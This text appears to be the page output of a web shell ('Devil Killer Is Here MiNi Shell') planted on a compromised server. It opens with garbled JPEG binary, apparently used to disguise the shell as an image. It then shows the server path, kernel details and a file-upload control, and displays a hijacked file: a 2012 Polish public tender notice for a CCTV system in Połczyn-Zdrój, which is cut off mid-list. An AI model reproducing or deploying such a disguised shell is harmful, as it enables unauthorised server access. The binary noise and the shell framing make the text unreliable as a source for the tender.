JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120201/27381-N-2012.html

<p class="kh_header"><b>Połczyn-Zdrój: Monitoring wizyjny na terenie Połczyna-Zdroju</b><br>
<b>Numer ogłoszenia: 27381 - 2012; data zamieszczenia: 01.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Połczyn-Zdrój , Plac Wolności 3-4, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 94 3666100, faks 94 3666105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polczyn-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitoring wizyjny na terenie Połczyna-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie niezbędnych projektów dla 
poszczególnych punktów systemu i robót polegających na budowie systemu 
monitoringu wizyjnego na terenie Miasta Połczyna-Zdroju oraz konserwacja 
i obsługa techniczna wykonanego systemu monitoringu przez okres do 30.12.2015r.
Zakres zadania obejmuje:
Zamawiający przewidział wykonanie systemu dozoru opartego o 4 kamery szybkoobrotowe posiadające minimum 460 linii telewizyjnych, umożliwiających rejestrację obrazu w jakości 2CIF lub 4CIF z częstotliwością odświeżania 25 obrazów na sekundę. Przewidziane przez Zamawiającego głowice kamer umożliwiają przybliżanie 26- lub 36-krotne obserwowanego obrazu. Wszystkie kamery zaopatrzone winny być w obudowy wyposażone w grzałki umożliwiające pracę kamer przy temperaturach ujemnych. Do zasilania kamer wykorzystywane będą lokalne źródła zasilania napięciem zmiennym 230 V . Napięcie to będzie doprowadzone do skrzynek teletechnicznych, które wyposażone będą w układ rozdziału zasilania, urządzenia ochrony p/przepięciowej, urządzenia radiowe, urządzenia potrzymania zasilania kamer i urządzeń radiowych po zaniku napięcia sieci 230V. Kamery zamontowane będą na terenie miasta w wytypowanych i zaakceptowanych przez Zamawiającego lokalizacjach:
     - budynek dydaktyczny Publicznej Szkoły Podstawowej Nr 1 w Połczynie-Zdroju
       przy ulicy Grunwaldzkiej 10,
     - narożny budynek na krzyżowaniu ulic: Grunwaldzkiej i Demokracji,
     - narożny budynek na krzyżowaniu ulic: Grunwaldzkiej i Mariackiej,
     - narożny budynek na skrzyżowaniu ulic: Grunwaldzkiej i 5-go Marca.

Prace instalacyjno-montażowe prowadzone będą w zabytkowym centrum Połczyna-Zdroju w strefie A i B ochrony konserwatorskiej.  
Z każdej kamery do systemu rejestracji przesyłane będą sygnały 4Mb (2,5 Mb+1,5 Mb).
 
Do budowy transmisyjnej sieci szkieletowej systemu zostanie wykorzystane medium radiowe pracujące 5 GHz oraz kable światłowodowe należące do wybranego operatora systemów teleinformatycznych, który będzie stroną umowy zawartej pomiędzy Zamawiającym a Wykonawcą.  W architekturze sieci przewidziany jest punkt rejestracji obrazów: centrum dozoru CD1 w siedzibie Komisariatu Policji w Połczynie-Zdroju.
Rejestracja sygnałów wideo będzie odbywała się z wykorzystaniem macierzy dyskowych w centrum CD1 o tak dobranej przez Wykonawcę pojemności by zapewnić wymogi Rozporządzenia Rady Ministrów z dnia 16.12.2009             
(Dz.U Nr 220/2009 poz.1720).
Minimalna jakość zapisu obrazu wynosi 5 kl/s w 4CIF.
Zamawiający wymaga aby wszystkie elementy systemu miały zagwarantowane podtrzymanie zasilania po zaniku napięcia sieci 230V przez czas minimum15 minut. Oferta powinna wykazać spełnienie tego warunku.
Zakres rzeczowy robót, dostaw i usług obejmuje:
a) wykonanie projektu technicznego instalacji 4 punktów kamerowych
b) wykonanie projektu technicznego systemu monitoringu
c) wykonanie projektu technicznego systemu radiowego

W/w projekty od a) do c) powinny zawierać niezbędne uzgodnienia, obliczenia, pomiary tak, by wykazać spełnianie postawionych przez Zamawiającego wymogów SIWZ w proponowanych przez Wykonawcę rozwiązaniach.
     d) budowę 4 punktów kamerowych 
     e) uruchomienie systemu w oparciu o zrealizowane zakresy 
     f) zamontowanie systemu sygnalizacji napadu i zapewnienie monitorowania  
      sygnałów alarmowych przez Centrum Monitorowania Wykonawcy 
      dwutorowo, w tym drogą radiową na własnej wydzielonej częstotliwości
    g) zapewnienie łączności radiowej typu dyspozytorskiego na własnym  
      wydzielonym paśmie pomiędzy centrum dozoru i centrum monitorowania  
      sygnałów alarmowych.

      Po zrealizowaniu punktów od a) do g) nastąpi odbiór końcowy wykonanych 
      robót.
     h) po odbiorze Wykonawca zobowiązany będzie przez okres 3 lat do 
         konserwacji i obsługi technicznej wykonanego systemu monitoringu.

UWAGA: 
    Wszystkie wskazane z nazwy materiały i przyjęte technologie użyte    
    w dokumentacji technicznej należy rozumieć jako określenie wymaganych  
    minimalnych parametrów technicznych lub standardów jakościowych. 
   Oznacza to, że Zamawiający dopuszcza składanie ofert równoważnych dla  
    nazwanych materiałów oraz proponowanej technologii wykonania, 
    wymienionych w powołanej dokumentacji technicznej z zachowaniem jej 
    wymogów w zakresie jakości. Ciężar udowodnienia zachowania 
    minimalnych parametrów technicznych lub standardów jakościowych, 
    wymaganych przez Zamawiającego, leżeć będzie w trakcie realizacji robót 
    po stronie Wykonawcy składającego ofertę.

Wykonawca zobowiązany będzie do prowadzenia w trakcie realizacji robót 
instalacyjno-montażowych - dziennika robót.
Płatności za wykonane i wykonywane czynności następować będą w okresach miesięcznych poprzez faktury częściowe wystawiane do 30.12.2015r. w równych 
wysokościach.
Wykonana instalacja i zamontowane urządzenia muszą zapewniać dalszą rozbudowę systemu monitoringu w przyszłości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.23.50.00-9, 32.32.35.00-8, 51.31.20.00-2, 45.31.00.00-3, 71.32.00.00-7, 71.32.31.00-9, 51.32.10.00-8, 51.31.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje składania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca musi być zarejestrowany jako zdolny do realizacji określonych 
  prac
2. Wykonawca musi posiadać aktualną koncesję Ministra Spraw Wewnętrznych 
   i Administracji na wykonywanie prac związanych z techniczną i fizyczną 
   ochroną mienia
3. Wykonawca musi posiadać aktualne pozwolenie radiowe na używanie 
   radiowych urządzeń nadawczych lub nadawczo-odbiorczych, pracujących 
   w służbie radiokomunikacji ruchomej lądowej typu monitoringu systemów 
   alarmowych, na własnej wydzielonej częstotliwości, obejmujące swym 
   zasięgiem rejon m. Połczyn-Zdrój, wyszczególnione w warunkach 
   wykorzystania częstotliwości
4.Wykonawca musi posiadać aktualne pozwolenie radiowe na używanie 
  radiowych urządzeń nadawczych lub nadawczo - odbiorczych, pracujących 
  w służbie radiokomunikacji ruchomej lądowej typu dyspozytorskiego, na 
  własnej wydzielonej częstotliwości, obejmującej swym zasięgiem rejon 
  m. Połczyn-Zdrój, wyszczególnione w warunkach wykorzystania częstotliwości

Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania 
ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, wykonywał lub 
wykonuje minimum jedną usługę o charakterze i złożoności porównywalnej 
z zakresem zadania tj. usługę wykonania i administrowania systemem 
monitoringu miejskiego.

Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada lub zapewni o możliwości dysponowania koniecznym potencjałem technicznym do wykonania przedmiotu zamówienia

Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada lub zapewni o możliwości dysponowania odpowiednią kadrą techniczną z kwalifikacjami w zakresie wykonywania prac o charakterze podobnym do przewidzianych w zamówieniu. 
Za wystarczające Zamawiający uzna dysponowanie:
- minimum 1 osobą posiadającą uprawnienia do pełnienia samodzielnych 
  funkcji technicznych w budownictwie do kierowania robotami budowlanymi  
  w specjalności elektrycznej, telekomunikacyjnej przewodowej i radiowej;
- minimum 2 osobami zdolnymi do wykonania niniejszego zamówienia, 
  posiadającymi licencję II stopnia pracownika zabezpieczenia technicznego;
- minimum 1 osobą posiadającą świadectwo kwalifikacji w zakresie dozoru 
  montażu, obsługi i kontrolno pomiarowym instalacji i urządzeń o napięciu 
  nie wyższym niż 1 kV;

Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500.000 zł (słownie: pięćset tysięcy złotych 00/100).

Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie wymaganych dokumentów i oświadczeń wskazanych w pkt. 10 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 
2. Opis zaproponowanego przez Wykonawcę rozwiązania technicznego 
   zawierającego co najmniej (§ 5 ust.1 rozporządzenia Prezesa Rady Ministrów 
   z dnia 30 grudnia 2009 r. - Dz. U. Nr 226 z 2009 roku, poz. 1817)
3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie 
   wynikają z przepisów prawa lub innych dokumentów rejestrowych
4. Aktualną koncesję Ministra Spraw Wewnętrznych i Administracji na   
    wykonywanie prac związanych z techniczną i fizyczną ochroną mienia
5. Aktualne pozwolenie radiowe na używanie radiowych urządzeń nadawczych lub 
  nadawczo-odbiorczych, pracujących w służbie radiokomunikacji ruchomej 
  lądowej typu monitoringu systemów alarmowych, na własnej wydzielonej 
  częstotliwości, obejmujące swym zasięgiem rejon m. Połczyn-Zdrój, 
  wyszczególnione w warunkach wykorzystania częstotliwości
6. Aktualne pozwolenie radiowe na używanie radiowych urządzeń nadawczych lub 
  nadawczo - odbiorczych, pracujących w służbie radiokomunikacji ruchomej 
  lądowej typu dyspozytorskiego, na własnej wydzielonej częstotliwości, 
  obejmującej swym zasięgiem rejon m. Połczyn-Zdrój, wyszczególnione w 
  warunkach wykorzystania częstotliwości
7. Oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 
   ust 1 i 2 pzp</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust 1 ustawy Pzp Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
a) przesunięcia terminu wykonania robót, które możliwe będzie jedynie na wniosek Wykonawcy, w przypadku wystąpienia robót dodatkowych, przewidzianych w art. 67 ust. 1 pkt. 5 ustawy Prawo Zamówień Publicznych;
b) przesunięcia terminu wykonania robót, które możliwe będzie jedynie na wniosek Wykonawcy, w przypadku wystąpienia przestojów i opóźnień zawinionych przez Zamawiającego;
c) przesunięcia terminu wykonania robót, które możliwe będzie z przyczyn 
losowych, jedynie na wniosek Wykonawcy, w przypadku wystąpienia działania 
siły wyższej (np. klęski żywiołowe, itp.), mającej bezpośredni wpływ na 
   terminowość wykonywania robót;
d) w uzasadnionych przypadkach lub innych okolicznościach niezależnych od
Zamawiającego lub Wykonawcy konieczna będzie zmiana terminu realizacji
zamówienia;
e) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia   zmian wynikających z okoliczności, których nie można było przewidzieć w chwili   
zawarcia umowy;
f) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla
Zamawiającego, a wynikły one w trakcie realizacji zamówienia;



g) zmiany obowiązującej stawki VAT:
